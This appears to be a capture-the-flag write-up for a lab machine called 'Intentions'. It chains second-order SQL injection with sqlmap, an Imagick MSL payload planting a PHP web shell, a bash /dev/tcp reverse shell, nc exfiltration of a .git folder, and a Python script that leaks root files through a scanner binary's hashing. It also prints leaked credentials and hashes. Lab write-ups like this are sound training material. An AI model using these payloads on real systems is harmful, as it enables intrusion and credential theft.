# Nmap scan

```
Nmap scan report for 10.10.11.220
Host is up, received reset ttl 63 (0.087s latency).
Scanned at 2023-07-07 15:13:15 EDT for 17s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCbEW8beTNeBRfWCUhSxjST5j/gsczjYvLp9vmAsclM2CG/L0KsthRQMThUc1L+eJC0mVYm46K2qkCVwni2zNHU=
|   256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEdBQnXdYum2v3ky5zsqh2jiTOu8kbWYpKiDFJmRJ97m
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Intentions
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Enumeration 

Create new user web page.

`http://10.10.11.220/`

![img](img/Pasted%20image%2020230720205017.png)

Login with new user

![img](img/Pasted%20image%2020230720205256.png)

We have an option to change Feed page.

![img](img/Pasted%20image%2020230720205428.png)

We can see the result in the next page.

![img](img/Pasted%20image%2020230720205509.png)

## SQL INJECTION SECOND ORDER

After test some attacks we identify that the application is vulnerable to sql inject. So we will use sqlmap to exploit.

```
sqlmap -r req.txt --second-req req2.txt --tamper=space2comment
```

![img](img/Pasted%20image%2020230720210810.png)

![img](img/Pasted%20image%2020230720210852.png)

```
sqlmap -r req.txt --second-req req2.txt --tamper=space2comment --dbs
```

![img](img/Pasted%20image%2020230720211456.png)

```
sqlmap -r req.txt --second-req req2.txt --tamper=space2comment -D intentions --tables
```

![img](img/Pasted%20image%2020230720212017.png)

```
sqlmap -r req.txt --second-req req2.txt --tamper=space2comment -D intentions -T users --dump
```

![img](img/Pasted%20image%2020230720223507.png)

I stopped sqlmap because we only need the 2 first records.

```
steve@intentions.htb : $2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa
greg@inetentions.htb : $2y$10$95OR7nHSkYuFUUxsT1KS6uoQ93aufmrpknz4jwRqzIbsUpRiiyU5m
```

## Login with hash

We can see if we change path of /api/v1 to /api/v2 another message appears.

![img](img/Pasted%20image%2020230720213641.png)

Using hash of databases get next response.

![img](img/Pasted%20image%2020230720221851.png)

We can access to admin page.

`http://10.10.11.220/admin#/`

![img](img/Pasted%20image%2020230801192444.png)

The modified image function is using imagick class.

![img](img/Pasted%20image%2020230801192537.png)

## Imagick exploit

```
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=none HTTP/1.1
Host: 10.10.11.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 305
Connection: close
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNjkwOTMxNzYyLCJleHAiOjE2OTA5NTMzNjIsIm5iZiI6MTY5MDkzMTc2MiwianRpIjoiSFRTa0xoUnhnMW9lRjdtSiIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.jGrzVYoyExyclydwyW78hGYyY88-4i1qffy12PrBHqs
Content-Type: multipart/form-data; boundary=doom

--doom
Content-Disposition: form-data; name="doom"; filename="doom.msl"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?php system($_GET['cmd']); ?&gt;" />
<write filename="info:/var/www/html/intentions/public/doom.php" />
</image>

--doom--
```

`http://10.10.11.220/api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=none`

![img](img/Pasted%20image%2020230801194216.png)

`http://10.10.11.220/doom.php?cmd=id`

![img](img/Pasted%20image%2020230801194329.png)

We get reverse shell.

`http://10.10.11.220/doom.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.3/1234+0>%261'`

![img](img/Pasted%20image%2020230801194852.png)

![img](img/Pasted%20image%2020230801194827.png)

## Git files

We can see that there is a .git folder so we make a tar file to copy.

`tar -cf /tmp/git.tar .git`

![img](img/Pasted%20image%2020230801195741.png)

```
nc -w 5 10.10.14.3 4444 < git.tar
nc -lvnp 4444 > git.tar
```

![img](img/Pasted%20image%2020230801195842.png)

`tar xvf git.tar`

![img](img/Pasted%20image%2020230801195917.png)

`git log`

![img](img/Pasted%20image%2020230801200025.png)

We get password in logs.

`git show f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4`

![img](img/Pasted%20image%2020230801200109.png)

```
greg@intentions.htb : Gr3g1sTh3B3stDev3l0per!1998!
```

## SSH connect

`ssh greg@10.10.11.220`

![img](img/Pasted%20image%2020230801200325.png)

## Priv Esc

We can see two files.

![img](img/Pasted%20image%2020230801200611.png)

Also the script is using /op/scanner/scanner binary and we can use because the user belongs to scanner group.

![img](img/Pasted%20image%2020230801200715.png)

## Exploit scanner

We was testing the binary and we can see next:
- Create new file with random data
- Use binary to generate hash of the first byte
- Use md5sum to confirm that the hash is the same as the scanner made
- Change length to 2 and we can see the same thing both hashes are the same

![img](img/Pasted%20image%2020230801203923.png)

I use this script to get content of files.

```python
import hashlib
import os
import string


wordlist = string.printable
result = ""


def md5(data):
        return hashlib.md5(data.encode()).hexdigest()


def file_hash_by_len(filename, length):
    command = f"/opt/scanner/scanner -c {filename} -l {length} -p -s 1234"
    output = os.popen(command).read().split(" ")[-1].rstrip()
    return output


def get_next_char(target_hash):
    global result
    for char in wordlist:
        test_data = result + char
        test_hash = md5(test_data)
        if target_hash == test_hash:
            return char
    return None


def main():
    global result
    filename = input("File-Path: ")
    byte_len = 1
    while True:
        target_hash = file_hash_by_len(filename, byte_len)
        new_char = get_next_char(target_hash)
        if not new_char:
            break
        result += new_char
        byte_len += 1
    print(result)


if __name__ == "__main__":
    main()
```

`python3 exploit.py`

![img](img/Pasted%20image%2020230801205354.png)

`ssh -i root_rsa root@10.10.11.220`

![img](img/Pasted%20image%2020230801205446.png)

```
root:$y$j9T$JjiD.nZgfr5ZSBdO4E9rY0$ZOElIJaX9F5qdpt54qFqtklDntYf/yo4kEUqqD/KFyA:19519:0:99999:7:::
```

## Resources
https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap \
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
